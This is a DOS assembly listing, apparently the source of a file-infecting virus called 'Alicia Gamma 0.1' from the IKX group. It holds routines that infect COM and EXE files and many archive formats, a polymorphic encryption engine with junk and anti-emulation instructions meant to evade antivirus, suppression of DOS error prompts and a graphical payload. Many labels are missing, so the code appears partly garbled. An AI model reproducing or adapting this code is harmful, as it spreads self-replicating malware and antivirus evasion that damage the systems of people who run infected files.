cmp word ptr cs:[si-2],0A7DCh ; test integrity
jne zoo_continue
mov bp,96
sub bp,cx
add bp,2
pop cx
pop dx
sub dx,bp
sbb cx,0
push cx
push dx
add dx,26h+13+15
adc cx,0
mov word ptr cs:[di+10],dx ; set offset of next header
mov word ptr cs:[di+10+2],cx
add dx,word ptr cs:[totalsize]
adc cx,0
mov word ptr cs:[di+6],dx
mov word ptr cs:[di+6+2],cx
pop dx
pop cx
xor ax,ax
call gozero ; go at begining
push ax
push dx
mov cx,bp
mov ah,3fh
mov dx,offset temporary1+256
int 21h ; read 256 bytes
pop cx
pop dx
xor ax,ax
call gozero ; go at the beging
mov ah,40h
mov cx,26h+13+15
mov dx,offset temporary1
add dx,word ptr cs:[temporary1+18h]
int 21h ; write our header+virus
call write_virus
mov ah,40h
mov cx,bp
mov dx,offset temporary1+256
int 21h ; write last packet
jmp invalid_zoo
mov bp,si
mov byte ptr cs:[bp+5],00
mov dx,word ptr cs:[precrc16] ; set crc
mov word ptr cs:[bp+12h],dx
mov word ptr cs:[bp+1Fh],0
mov word ptr cs:[bp+1Fh+2],0
mov word ptr cs:[bp+1Fh+4],0
mov ax,word ptr cs:[totalsize] ; set size
mov word ptr cs:[bp+14h],ax
mov word ptr cs:[bp+14h+2],0
mov word ptr cs:[bp+18h],ax
mov word ptr cs:[bp+18h+2],0
call set_a_name
mov si,offset betaname
lea di,[bp+26h]
repz movsb
mov di,bp
get_host: ; get extension from ds:si
mov cx,256
cmp byte ptr ds:[si],2Eh
je test_ext
inc si
dec cx
jnz stoof
mov bp,offset list0
mov cl,byte ptr cs:[nblist]
mov ax,word ptr ds:[si+1]
cmp word ptr cs:[bp],ax
je ext_verify2
add ax,2020h ; check for maj/min
cmp word ptr cs:[bp],ax ; from the lis
jne not_correct
mov al,byte ptr ds:[si+3] ;
cmp byte ptr cs:[bp+2],al ;
je allokay
add al,20h
cmp byte ptr cs:[bp+2],al
jne not_correct
mov di,word ptr cs:[bp+3] ; if found fix
mov si,word ptr cs:[bp+5] ; where we return
mov word ptr cs:[offreturn],si ; and the infection
ret ; routine
add bp,7
dec cl
jnz test_extension ; else return with
sub ax,-1 ; carry
nblist: db 12 ; infection list
db 'com'
dw offset infect_com
dw offset return_com
db 'zip'
dw offset infect_zip
dw offset playingload
db 'arj'
dw offset infect_arj
dw offset playingload
db 'rar'
dw offset infect_rar
dw offset playingload
db 'ace'
dw offset infect_ace
dw offset playingload
db 'ha',0
dw offset infect_ha
dw offset playingload
db 'arc'
dw offset infect_arc
dw offset playingload
db 'pak'
dw offset infect_arc
dw offset playingload
db 'lzh'
dw offset infect_lzh
dw offset playingload
db 'lha'
dw offset infect_lzh
dw offset playingload
db 'zoo'
dw offset infect_zoo
dw offset playingload
db 'exe'
dw offset infect_exe
dw offset return_exe
openf: ; open file in write mode
; save all etc etc
mov ax,4300h-1
inc ax
mov dx,si
int 21h
mov cx,offset cs:[temporaryattr]
mov ax,4301h-1
inc ax
xor cx,cx
mov dx,si
int 21h
jc openf_security_fail
mov ax,3D02h
mov dx,si
int 21h
xchg ax,bx
xor ax,ax
sub ah,-1 ; if fail return with carry
mov ax,2
call go
mov word ptr cs:[finallowsize],ax
mov word ptr cs:[finalhisize],dx
mov ax,5801h ; close the file & restore
dec ah
mov cx,word ptr cs:[temporaryhour] ; all
and cl,11110000b
add cl,00001010b
mov dx,word ptr cs:[temporarydate]
int 21h
mov ah,3eh
int 21h
mov ax,4301h-1
inc ax
mov cx,word ptr cs:[temporaryattr]
mov dx,si
int 21h
poly: ; here's the poly
push ax
push cs
pop es
mov word ptr cs:[cryptbuff],offset starttable+1024-1
mov ax,word ptr cs:[databuff]
shr dx,8
mul dx
mov cx,1024/2
mov di,offset starttable+1024
push di
looptable: ; build our table
mov bx,ax
xor bh,bh
shl bx,2
add ax,bx
xor ax,2481h
dec cx
jnz looptable ; generate a table to
pop si ; have a maximum
mov di,0 ; of random values
pop es
mov dx,word ptr cs:[prepared]
push dx
mov word ptr es:[di],00e8h ; call gegen
mov byte ptr es:[di+2],00h
add di,3
mov al,byte ptr cs:[regged] ; pop regged
call make_a_pop
mov byte ptr es:[di],ah
inc di
mov al,byte ptr cs:[regged] ; lea verified,reg+start+crypt
push ax
call reg_to_mem_binmodification
pop ax
call make_a_lea
mov word ptr es:[di],ax
add di,4
mov al,byte ptr cs:[regged]
mov dh,byte ptr cs:[verifyreg]
push dx
call make_a_mov_r_r ; mov verified ,regged
pop dx
mov cl,dh
call make_an_op ; add regged , fin-start
add di,2
mov al,byte ptr cs:[sliding]
call make_a_mov
add di,2 ; make the value in the mov
mov word ptr es:[di],00e8h ; call gegen
mov byte ptr es:[di+2],00h
add di,3
mov al,byte ptr cs:[verifyreg]
call make_a_push ; push verifyreg
mov byte ptr es:[di],ah
inc di
mov al,byte ptr cs:[regged] ; mov operated,[regged]
Call Reg_To_Mem_BinModification
mov al,byte ptr cs:[operated]
call make_a_mov_r_v
mov byte ptr es:[di],0
inc di
; ************************************************************************
pop dx
mov ch,byte ptr cs:[operated]
xor dh,dh
inc dx
shl dx,1
mov bp,dx ; bp = number of instructions
cmp bp,256
ja makenewop
add bp,100
mov dx,word ptr cs:[si] ; dx = random value (see upper)
xor cl,dl
push si
mov si,word ptr cs:[cryptbuff]
call those_op ; render one instruction
mov word ptr cs:[cryptbuff],si
pop si ; of the decryptor/encryptor
inc si
dec bp
jne makenewop
mov byte ptr cs:[starttable+1024-1],0c3h ; create
mov al,byte ptr cs:[regged] ; mov [regged],operated
Call Reg_To_Mem_BinModification
mov al,byte ptr cs:[operated]
call make_a_mov_v_r
mov byte ptr es:[di],0
inc di
mov al,byte ptr cs:[verifyreg]
call make_a_pop ; push verifyreg
mov byte ptr es:[di],ah
inc di
mov ah,40H
add ah,byte ptr cs:[regged]
mov byte ptr es:[di],ah
inc di
mov byte ptr es:[di],ah
inc di
mov ax,1100000000111011b
add ah,byte ptr cs:[verifyreg]
mov dl,byte ptr cs:[regged]
shl dl,3
add ah,dl
mov word ptr es:[di],ax
add di,2
mov ax,0774h
mov word ptr es:[di],ax
add di,2
mov al,byte ptr cs:[tempreg] ; pop regged
call make_a_pop
mov byte ptr es:[di],ah
inc di
mov cl,byte ptr cs:[tempreg]
call make_an_op ; add regged , fin-start
sub di,1
add byte ptr es:[di],00101000b
add di,1
mov ax,0003h
mov word ptr es:[di],ax
add di,2
mov al,byte ptr cs:[tempreg]
call make_a_push ; push verifyreg
mov byte ptr es:[di],ah
inc di
mov ax,58c3h
mov word ptr es:[di],ax
add di,2
mov word ptr es:[06],di
sub word ptr es:[06],3
mov ax,fin-start
mov word ptr es:[12],ax
add di,ax
mov word ptr cs:[totalsize],di
mov si,offset start
add si,ax
shr ax,1
mov cx,ax
add cx,1
mov al,byte ptr cs:[sliding] ; pop regged
call make_a_pop
mov byte ptr cs:[popslidin],ah
mov al,byte ptr cs:[operated] ; pop operate
call make_a_pop
mov byte ptr cs:[popoper],ah
mov al,byte ptr cs:[sliding] ; push regged
call make_a_push
mov byte ptr cs:[pushslidin],ah
mov al,byte ptr cs:[operated] ; push operate
call make_a_push
mov byte ptr cs:[pushoper],ah
mov ax,word ptr cs:[predifinedkey]
mov word ptr cs:[slidingprev],ax
push cx
push di
mov ax,word ptr cs:[Slidingprev]
push ax
mov ax,word ptr cs:[si]
push ax
popoper: nop ; pop operated1
popslidin: nop ; pop slidin
call word ptr cs:[cryptbuff]
pushslidin: nop
pop ax
mov word ptr cs:[slidingprev],ax
pushoper: nop
pop ax
pop di
mov word ptr es:[di],ax
pop cx
sub di,2
sub si,2
dec cx
jnz ourLoop1
mov ax,word ptr cs:[slidingprev]
mov word ptr es:[15],ax
Make_a_lea: ; save lea ... bzzz save lea...
push cx
push dx
mov dl,8Dh
mov ah,10000000b
add ah,dh
shl al,3
add ah,al
mov dh,ah
mov ax,dx
pop dx
pop cx
; The Intel Shit use a non comprehensible way for converting a reg into a mem
; address
; dl = register
; dh = memory register
mov dh,00000100b
cmp al,00000110b
je M_a_l_0
mov dh,00000110b
cmp al,00000101b
je M_a_l_0
mov dh,00000101b
cmp al,00000111b
je M_a_l_0
mov dh,00000111b
M_a_l_0: ret
cmp ch,00000100b
ja skipadd_it
mov ch,00000011b
; This make a push
; al = 16 bit reg
; in ds:si
mov ah,01010000b
jmp M_P
; This make a pop
; al = 16 bit reg
; in ds:si
mov ah,01011000b ; val for Pop
M_P: add ah,al
cmp ch,00000100b
jne not_sp
inc ch
cmp ch,00000000b
jne not_ax
inc ch
cmp ch,byte ptr cs:[bp+regged]
jne not_operated
inc ch
cmp ch,00000111b
jna verify_reg
mov ch,1
jmp verify_reg
cmp ch,byte ptr cs:[bp+sliding]
jne not_sliding
inc ch
cmp ch,00000111b
jna verify_reg
mov ch,1
jmp verify_reg
cmp ch,byte ptr cs:[bp+operated]
jne not_lastone
inc ch
cmp ch,00000111b
jna verify_reg
mov ch,1
jmp verify_reg
cmp ch,byte ptr cs:[bp+lastone]
jne not_regged
inc ch
cmp ch,00000111b
jna verify_reg
mov ch,1
jmp verify_reg
make_a_mov_v_r: ; create a mov [],reg
push ax
mov ax,892eh
mov word ptr es:[di],ax
add di,2
pop ax
push ax
mov ah,01000000b
add ah,dh
shl al,3
add ah,al
mov byte ptr es:[di],ah
inc di
pop ax
make_a_mov_r_v: ; mov ax,[]
push ax
mov ax,8b2eh
mov word ptr es:[di],ax
add di,2
pop ax
push ax
mov ah,01000000b
add ah,dh
shl al,3
add ah,al
mov byte ptr es:[di],ah
inc di
pop ax
; Add a mov 16_bit_reg,
; In DS:SI
; Put your variable after
push ax
mov ah,0B8h
add ah,al
mov byte ptr es:[di],ah
inc di
pop ax
push ax
mov ah,08Bh
mov byte ptr es:[di],ah
inc di
mov ah,0c0h
add ah,al
shl dh,3
add ah,dh
mov byte ptr es:[di],ah
inc di
pop ax
fixAdd: pop cx ; See upper
cmp cl,0
jne notax
mov ah,05
mov byte ptr es:[di],ah
inc di
jmp axright
notax: mov ax,1100000010000001b
add ah,cl
mov word ptr es:[di],ax
add di,2
axright: mov word ptr es:[di],dx
add di,2
pop ax
; It's add a classic operation : Add ,xor ,or ,and , sub etc etc
; in DS:SI , this fix also the add ax, 2 bytes only
; cl = 16 bits Register
; dx = value
push ax cx
mov ax,1100000010000001b
add ah,cl
mov word ptr es:[di],ax
add di,2
pop ax
pop cx
push cx
and cl,00000001b
cmp cl,00000001b
pop cx
je thop0
jmp make_a_noise ; generate a junk 1 chance / 2
push cx
and cl,01000000b
cmp cl,01000000b
pop cx
jne thop1
jmp make_op_reg_val ; generate a real xor ax,xxxx
; 1/4
push cx
and cl,10000000b
cmp cl,10000000b
pop cx
jne thop2
jmp make_op_r_r ; generate a real add ax,keyreg
; 1/8
push cx
and cl,00000100b
cmp cl,00000100b
pop cx
jne thop3
jmp make_a_dec_adv ; dec/inc the keyreg 1/16
jmp make_a_rorl
cmp byte ptr cs:[lastone],1
je make_op_r_r
mov byte ptr cs:[lastone],1
push cx ax
push cx ; test for interuption call
and cl,00111100b ; routine
cmp cl,00111100b
pop cx
je make_advanced_noise
push dx
and cl,00000111b
push bp
xor bp,bp
call verify_reg ; check to doesn't hurt real
pop bp
push cx ; reg used by us
mov ch,dh
and ch,00000111b
push bp
xor bp,bp
call verify_reg ; check to doesn't hurt real
pop bp
shl ch,3 ; reg used by us
mov dh,ch
pop cx
add ch,dh ; prepare to do a mov reg,reg
and ch,00111111b
pop dx
and dh,00111000b
cmp dh,00111000b
jne put_tha_good
and dh,00110000b ; check for not compare
put_tha_good: ; don't want any confusion
mov ax,1100000000000011b
add al,dh
add ah,ch
mov word ptr es:[di],ax
add di,2
pop ax cx
ret ; that's added into di
make_advanced_noise: ; put some interrupt and
pop ax cx ; anti emulating trick
push ax cx ; to phuck av
add cl,01010101b
and cl,00000011b
mov al,cl
xor ah,ah
mov bx,4
mul bx
mov bx,ax
mov ax,word ptr cs:[bx+no_action_interrupt]
mov word ptr es:[di],ax
mov ax,word ptr cs:[bx+no_action_interrupt+2]
mov word ptr es:[di+2],ax
add di,4
pop cx ax
cmp byte ptr cs:[lastone],2
je make_op_reg_val
mov byte ptr cs:[lastone],2
push cx ax
and cl,00101000b
cmp cl,0
je make_op0
and cl,00001000b
add cl,00001000b
add cl,00100000b
mov ax,1100000000000011b
push ax
add al,cl ; cl is the instruction
shl ch,3 ; ch contains the destination reg
add ch,byte ptr cs:[sliding] ; add to ch the key reg
add ah,ch
mov word ptr es:[di],ax ; ax = the builded instruction
add di,2
cmp cl,00110000b
je skipchange
cmp cl,0
jne skipchange0
mov cl,00101000b
jmp skipchange
mov cl,0
pop ax
add al,cl
add ah,ch
mov word ptr cs:[si-2],ax
sub si,2
pop ax cx
cmp byte ptr cs:[lastone],3 ; compare if there's already a ror
;je make_a_rorl ; don't have two time ror rol or
mov byte ptr cs:[lastone],3 ; vice versa !
push cx
and cl,00101000b ; test for instruction validity
cmp cl,0
je make_op
and cl,00001000b ; just permit xor add sub
add cl,00001000b ;
add cl,00100000b
push cx
call make_an_op0 ; build that operation
pop cx
cmp cl,00110000b
je skipchangea
cmp cl,0
jne skipchange0a
mov cl,00101000b
jmp skipchangea
mov cl,0
push es
push di
push cs
pop es
push si
pop di
sub di,4
call make_an_op0
sub si,4
pop di
pop es
pop cx
make_a_rorl: ; build a ror/rol
cmp byte ptr cs:[lastone],4
je make_a_dec_adv
mov byte ptr cs:[lastone],4
push ax cx
xor ax,ax
push cx
and cl,00000010b
cmp cl,00000010b
pop cx
je make_a_ror
Make_a_rol: mov ah,0c8h ; op code for rol
mov ch,0c0h
jmp M_a_ir
mov ah,0c0h ; op code for ror
mov ch,0c8h
M_a_ir: add ah,byte ptr cs:[operated] ; do it on operator key
mov al,0C1h ; opcode for ror/rol
mov word ptr es:[di],ax
add di,2
add ch,byte ptr cs:[operated]
mov ah,ch
mov word ptr cs:[si-3],ax
pop cx
push cx
and cl,00000011b
mov byte ptr es:[di],cl ; put it on the buffar
inc di
mov byte ptr cs:[si-1],cl
sub si,3
pop cx ax
cmp byte ptr cs:[lastone],5 ; don't have a inc/dec
jne dontmake_a_noise ; or dec/inc
jmp make_a_noise
mov byte ptr cs:[lastone],5
push cx ax
xor ax,ax
push cx
add cl,10101010b ; randomize more the
and cl,00000100b ; numbah!
cmp cl,00000100b
pop cx
je make_a_dec
mov ah,40h ; opcode for inc
mov al,48h
jmp M_a_i
mov ah,48h ; opcode for dec
mov al,40h
M_a_i: add ah,byte ptr cs:[sliding] ; do it in the sliding
add al,byte ptr cs:[sliding]
mov byte ptr es:[di],ah ; key
inc di
mov byte ptr cs:[si-1],al
dec si
pop ax cx ; return
; It's add a classic operation : Add ,xor ,or ,and , sub etc etc
; in DS:SI , this fix also the add ax, 2 bytes only
; cl = 16 bits Register
; dx = value
push ax cx
mov ax,1100000010000001b
add cl,byte ptr cs:[operated]
add ah,cl
mov word ptr es:[di],ax
add di,2
mov word ptr es:[di],dx
add di,2
pop ax
pop cx
mov ah,0dh
int 21h
mov ah,01h
int 16h
mov ah,19h
int 21h
not sp
not sp
cryptbuff: dw offset starttable-1
slidingprev: dw 0
tempreg: db 0
verifyreg: db 0
regged: db 0ffh
lastone: db 0ffh
operated: db 0ffh
sliding: db 0ffh
pusha ; test for poly conditions
call polyallocator
jc damned
call polydelocator
sub ah,-1
write_virus: ; write the virus on disk
push es
push ds
mov ah,40h
mov cx,word ptr cs:[totalsize]
mov dx,0
mov ds,word ptr cs:[genseg]
int 21h
pop ds
pop es
propoly: ; generate poly trick
push es
push ds
push cs
push cs
pop es
pop ds
call polyallocator
mov ax,word ptr cs:[genseg]
call poly ; generate poly in ax:0
push es
pop ds
xor si,si
mov ds,word ptr cs:[genseg]
mov cx,word ptr cs:[totalsize]
call crc_calc
mov word ptr cs:[precrc32cx],cx
mov word ptr cs:[precrc32dx],dx
xor si,si
mov ds,word ptr cs:[genseg]
mov cx,word ptr cs:[totalsize]
call crc_calc16
mov word ptr cs:[precrc16],dx
pop ds
pop es
polyinit_value: ;
mov ah,2ah-1
inc ah
int 21h
mov word ptr cs:[bp+cryptbuff],cx
mov word ptr cs:[bp+predifinedkey],cx
mov ah,2ch
int 21h ; get time
mov word ptr cs:[bp+polytemporary],dx
mov ch,dh
mov cl,dh
and ch,00000011b
add ch,00000100b
call get_the_mem_reg ; set the memory reg
mov byte ptr cs:[bp+regged],ch ; it 'll be never touched
mov ch,dh
xor ch,135
rcr ch,2
and ch,00000111b
call verify_reg ; verify to doesn't hurt other
mov byte ptr cs:[bp+sliding],ch ; reg & stack , set the sliding
; key
mov ch,dh
xor ch,30
add ch,10101010b
rcl ch,1
and ch,00000111b
call verify_reg
mov byte ptr cs:[bp+operated],ch ; the operator register
mov ch,dl
xor ch,20
add ch,10101010b
rcl ch,1
and ch,00000111b
call verify_reg
mov byte ptr cs:[bp+verifyreg],ch ; the operator register
mov ch,dl
xor ch,10
add ch,10101010b
rcl ch,1
and ch,00000111b
call verify_reg
mov byte ptr cs:[bp+tempreg],ch ; the
operator register
cmp ch,byte ptr cs:[bp+verifyreg]
jne not_reggedtmp
inc ch
cmp ch,00000111b
jna verify_regtmp
mov ch,1
jmp verify_regtmp
push es
mov bp,10000/16
call allocate
jc polyproblem
mov word ptr cs:[genseg],ax
pop es
pop es
sub ah,-1
push es
mov es,word ptr cs:[genseg]
call delocate
pop es
mov ah,19h
int 21h
cmp ah,1
ja sec_next0
xchg ax,dx
mov ah,16h
int 13h
cmp ah,6
je sec_next0
sub ah,-1
int24handler: ; no alert :p
mov al,3
mov byte ptr cs:[writeprot],1
save_state: ; save all state
mov word ptr cs:[savedes],es
mov word ptr cs:[savedds],ds
mov ax,3524h
int 21h ; save offset of int 24h
mov word ptr cs:[old24seg],es
mov word ptr cs:[old24off],bx
push cs
push cs
pop ds
pop es
mov ax,2524h
mov dx,offset int24handler
int 21h
mov ds,word ptr cs:[old24seg]
mov dx,word ptr cs:[old24off]
mov ax,2524h
int 21h ; refix int 24h
mov es,word ptr cs:[savedes]
mov ds,word ptr cs:[savedds]
mov ax,3D00h ; test if infected with
int 21h ; time stamp
xchg ax,bx
mov ax,5800h ; fix time size
dec ah
int 21h
mov word ptr cs:[temporarydate],cx
mov word ptr cs:[temporaryhour],cx
push cx
push cx
mov ah,3eh
int 21h ; close the file
pop cx
and cl,00001111b
cmp cl,00001010b
pop cx
je test_security_fail
xor ax,ax
test_security_fail: ; fail ? return
; with carry
sub ah,-1
payload: ; a small payload
; put an image on
lea bp,[bp+trademark] ; screen
mov cx,fintrade-trademark
mov ax,13h
int 10h ; clear screen
; fix video mode
push 0a000h
pop es
mov ax,00ffh
xor bx,bx
call setcolor ; set color 0ffh
xor ax,ax ; to 0,0,0
xor bx,bx
call setcolor ; and color 0 too
push cx
push bp
mov ax,1301h
mov bx,255
mov cx,1
mov dx,0
push es
push cs
pop es
int 10h ; put a char on screen
pop es
call printchar ; print big char
call minifadeout ; fade out pallette
pop bp
pop cx
inc bp
dec cx
jnz screenloop
ret ; return
mov ax,0FF07h ; do it 55 times
mov bx,0FFFFh
push ax
push bx
mov cx,55
loop_fadeit: ; fade color-1
sub ah,5
sub bx,0505h
call setcolor ; wait for color
call sync ; wait for sync
sub cx,5
jnz loop_fadeit
pop bx
pop ax
call setcolor ; set the color
push ax
mov dx, 3DAh
in al, dx
test al, 8
jz retrace1 ; wait for screen sync
in al, dx
test al, 8
jnz retrace2
pop ax
setcolor: ; set color palette
push ax
push bx
mov dx,3c8h
out dx,al
mov dx,3c9h
mov al,ah
out dx,al
mov al,bl
out dx,al
mov al,bh
out dx,al
pop bx
pop ax
printchar: ; print char with size * 20
mov bx,9
mov dx,9
mov di,(7*320)+8
mov ah,byte ptr es:[di]
push di
call write_big_point
pop di
dec di
dec bx
jnz minibx
sub di,320-9
mov bx,9
dec dx
jnz minibx
push dx
push bx
dec dx
dec cx
push ax
push dx
push bx
pop ax
mov cx,320/32
mul cx
mov si,ax
pop ax
mov cx,320
mul cx
mov cx,(200/20)
mul cx
add si,ax
pop ax
mov bx,200/20
mov cx,320/32
add si,(160-40)+(320*60)
cmp ah,255
jne minicx
mov ah,7
mov byte ptr es:[si],ah
inc si
loop minicx
add si,320-((320/32))
mov cx,(320/32)
dec bx
jnz minicx
pop bx
pop dx
playingload: ; put a small immage
lea si,[bp+yeye]
lea di,[bp+starttable]
mov cx,4800 ; decompact the image
push di
repz mov byte ptr cs:[di],0
pop di
mov cx,600+(14*8)
push cx
mov dl,byte ptr cs:[si]
mov cx,8
mov byte ptr cs:[di],0
mov dh,dl
and dh,00000001b
cmp dh,00000001b ; analyse binary
jne skipput1 ; if dh = 1
mov byte ptr cs:[di],1 ; the put 1 in the buffer
inc di
ror dl,1
loop minusloopa
pop cx
inc si
loop maxiloopa
mov ax,13h
int 10h ; set video
lea si,[bp+starttable]
mov di,0
push 0A000h
pop es
mov cx,80
push cx
mov cx,30
mov ax,word ptr cs:[si] ; put image in si
mov word ptr es:[di],ax
inc si
inc si
inc di
inc di
loop minusloop0
add di,320-60
pop cx
loop maxiloop0
xor ax,ax
int 16h ; wait for a key
mov ax,3
int 10h ; reset video
db 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0e0h, 0ffh, 0ffh, 0ffh, 0ffh
db 0ffh, 0ffh, 07fh, 002h, 000h, 000h, 000h, 000h, 000h, 000h, 024h, 000h
db 000h, 000h, 000h, 000h, 000h, 040h, 072h, 0fch, 038h, 01eh, 03ch, 0e7h
db 0e1h, 0a4h, 009h, 0c3h, 064h, 002h, 033h, 026h, 053h, 01ah, 030h, 04ch
db 026h, 018h, 063h, 032h, 0a5h, 001h, 0c3h, 064h, 0c2h, 030h, 026h, 053h
db 072h, 030h, 04ch, 026h, 006h, 063h, 032h, 025h, 008h, 0c3h, 064h, 032h
db 030h, 026h, 053h, 082h, 030h, 07ch, 01eh, 003h, 0e7h, 031h, 0a5h, 009h
db 0c3h, 064h, 032h, 032h, 026h, 053h, 072h, 030h, 04ch, 026h, 03fh, 067h
db 0e2h, 024h, 000h, 000h, 000h, 000h, 000h, 000h, 040h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e4h, 0ffh, 0ffh, 0ffh, 0ffh, 0ffh, 0ffh, 07fh
db 0feh, 0ffh, 0ffh, 0ffh, 0ffh, 0ffh, 0ffh, 0e7h, 0ffh, 0ffh, 03fh, 080h
db 0ffh, 0ffh, 07fh, 0feh, 0ffh, 03fh, 000h, 080h, 0ffh, 0ffh, 0e7h, 0ffh
db 0ffh, 000h, 000h, 0e0h, 0ffh, 07fh, 0feh, 0ffh, 003h, 000h, 000h, 0f8h
db 0ffh, 0e7h, 0ffh, 01fh, 000h, 000h, 000h, 0ffh, 07fh, 0feh, 07fh, 000h
db 000h, 000h, 0c2h, 0ffh, 0e7h, 0ffh, 003h, 000h, 000h, 0c0h, 0f8h, 07fh
db 0feh, 01fh, 000h, 000h, 000h, 010h, 0ffh, 0e7h, 0ffh, 000h, 000h, 000h
db 000h, 0e2h, 07fh, 0feh, 00fh, 000h, 000h, 000h, 040h, 0feh, 0e7h, 07fh
db 000h, 000h, 004h, 000h, 0c8h, 07fh, 0feh, 003h, 000h, 0e0h, 000h, 000h
db 0f9h, 0e7h, 03fh, 000h, 000h, 004h, 000h, 090h, 07fh, 0feh, 001h, 000h
db 000h, 000h, 000h, 0f0h, 0e7h, 01fh, 000h, 000h, 000h, 000h, 000h, 07fh
db 0feh, 000h, 000h, 000h, 000h, 000h, 0e0h, 0e7h, 00fh, 000h, 000h, 000h
db 000h, 000h, 07eh, 0feh, 000h, 000h, 000h, 000h, 000h, 0e0h, 0e7h, 03fh
db 000h, 000h, 000h, 000h, 000h, 07eh, 0feh, 03fh, 000h, 000h, 000h, 000h
db 0c0h, 0e7h, 0ffh, 07fh, 000h, 000h, 000h, 000h, 07ch, 0feh, 0ffh, 07fh
db 000h, 000h, 000h, 0c0h, 0e7h, 0ffh, 0ffh, 07fh, 000h, 000h, 000h, 07ch
db 0feh, 0ffh, 0ffh, 03fh, 000h, 000h, 0c0h, 0e7h, 0ffh, 0ffh, 0ffh, 000h
db 000h, 000h, 07ch, 0feh, 0ffh, 0ffh, 003h, 000h, 000h, 0c0h, 0e7h, 0ffh
db 0ffh, 00fh, 000h, 000h, 000h, 07ch, 0feh, 0ffh, 03fh, 000h, 000h, 000h
db 0c0h, 0e7h, 0ffh, 0ffh, 000h, 000h, 000h, 000h, 07eh, 0feh, 0ffh, 003h
db 000h, 000h, 000h, 0e0h, 0e7h, 0ffh, 00fh, 000h, 000h, 000h, 000h, 07eh
db 0feh, 03fh, 000h, 000h, 000h, 000h, 0e0h, 0e7h, 0ffh, 000h, 000h, 000h
db 000h, 000h, 07fh, 0feh, 003h, 000h, 000h, 000h, 000h, 0f0h, 0e7h, 03fh
db 000h, 000h, 000h, 000h, 080h, 07fh, 0feh, 003h, 000h, 000h, 000h, 000h
db 0f8h, 0e7h, 07fh, 000h, 000h, 000h, 000h, 0c0h, 07fh, 0feh, 00fh, 000h
db 000h, 000h, 000h, 0feh, 0e7h, 0ffh, 000h, 000h, 000h, 000h, 0e0h, 07fh
db 0feh, 01fh, 000h, 000h, 000h, 000h, 0ffh, 0e7h, 0ffh, 003h, 000h, 000h
db 000h, 0f8h, 07fh, 0feh, 07fh, 000h, 000h, 000h, 0c0h, 0ffh, 0e7h, 0ffh
db 01fh, 000h, 000h, 000h, 0ffh, 07fh, 0feh, 0ffh, 003h, 000h, 000h, 0f8h
db 0ffh, 0e7h, 0ffh, 0ffh, 000h, 000h, 0e0h, 0ffh, 07fh, 0feh, 0ffh, 03fh
db 000h, 080h, 0ffh, 0ffh, 0e7h, 0ffh, 0ffh, 03fh, 080h, 0ffh, 0ffh, 07fh
db 0feh, 0ffh, 0ffh, 0ffh, 0ffh, 0ffh, 0ffh, 0e7h, 0ffh, 0ffh, 0ffh, 0ffh
db 0ffh, 0ffh, 07fh, 0feh, 0ffh, 0ffh, 0ffh, 0ffh, 0ffh, 0ffh, 027h, 000h
db 000h, 000h, 000h, 000h, 000h, 040h, 07ah, 01ch, 0c7h, 0f1h, 038h, 0cch
db 0efh, 0a4h, 0c9h, 058h, 026h, 093h, 0c5h, 030h, 056h, 09ah, 08ch, 065h
db 032h, 059h, 00ch, 063h, 0a5h, 0c9h, 018h, 026h, 093h, 0c5h, 030h, 056h
db 09ah, 08ch, 061h, 032h, 059h, 00ch, 063h, 0a5h, 0c9h, 018h, 026h, 093h
db 0c5h, 030h, 056h, 07ah, 09ch, 065h, 0f2h, 058h, 00ch, 063h, 0a5h, 0c9h
db 058h, 026h, 093h, 0c5h, 030h, 056h, 09ah, 09ch, 0c7h, 031h, 039h, 01ch
db 0e3h, 024h, 000h, 000h, 000h, 000h, 000h, 000h, 040h, 0feh, 0ffh, 0ffh
db 0ffh, 0ffh, 0ffh, 0ffh, 007h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h
trademark: db ' A l i c i a Û Version Gamma 0 . 1 Û by Star0 I K X ',0
db ' In honor of B0z0 ikx '
writeprot: db ?
temporaryattr: dw ?
temporarydate: dw ?
temporaryhour: dw ?
finallowsize: dw ?
finalhisize: dw ?
savedds: dw ?
savedes: dw ?
offhost: dw ?
seghost: dw ?
old24seg: dw ?
old24off: dw ?
namesize: dw ?
zipoffst: dd ?
zipseg: dw ?
totalsize: dw ?
genseg: dw ?
precrc32cx: dw ?
precrc32dx: dw ?
precrc16: dw ?
polytemporary: dw ?
prepared: dw ?
databuff: dw ?
predifinedkey: dw ?
buffer7: db 7 dup (?)
betaname: db 13 dup (?)
save: db 01Ah dup (?)
temporary1: db 1024 dup (?)
starttable: db 1024 dup (?)
db 2 dup (?)
end start